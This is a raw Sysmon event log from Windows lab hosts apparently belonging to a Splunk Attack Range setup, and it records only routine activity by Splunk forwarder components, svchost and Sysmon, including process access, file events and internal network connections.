AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:47.391{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD75F3739E19B53FA7A7C3AE32B98DE4,SHA256=EC0106C4D94C594B38D5D74E97215D4C1F5379224E406CB80673B8A43A6549A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:48.408{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BDA3FBDBA8AA0F9F9FF0CBD74887957,SHA256=E04D3AB4501C3957762B9C4F23944E57A2BBAB1DC8E6A160C5CDCE891BFACE75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AAC-6216-6E05-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1AAC-6216-6E05-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.878{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AAC-6216-6E05-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.879{4F8D34B0-1AAC-6216-6E05-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:48.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9112AF06B13712BD987FA83D6E9525C5,SHA256=EE93CF8580127E1B7DC872482EB152A5406539C5B699A5D8ECDD8FD52F8C3063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:49.454{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A88319666B05393DD7B8767E03A56FCB,SHA256=964ADF8F2605E34C426D9D95552BAF99F12B6BB2FB44AC7A401B2200E22671EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7F06C2A12F495E5D20A465A04741C33,SHA256=EA4E0594C92805DF893E9E981E4A04631FE7B97AF21B98D305509F8FF0E70EB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.612{4F8D34B0-1AAD-6216-6F05-000000003902}15002364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23A3D7ABD0228A19A7C5075CF2749AFF,SHA256=1CA26423CD867936933A0925205BB7208E80EEEDADCEA1A55C9CA5E1C07FFC9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.321{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51800-false10.0.1.12-8089- 354300x8000000000000000299867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:47.615{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49662-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000223671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AAD-6216-6F05-000000003902}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL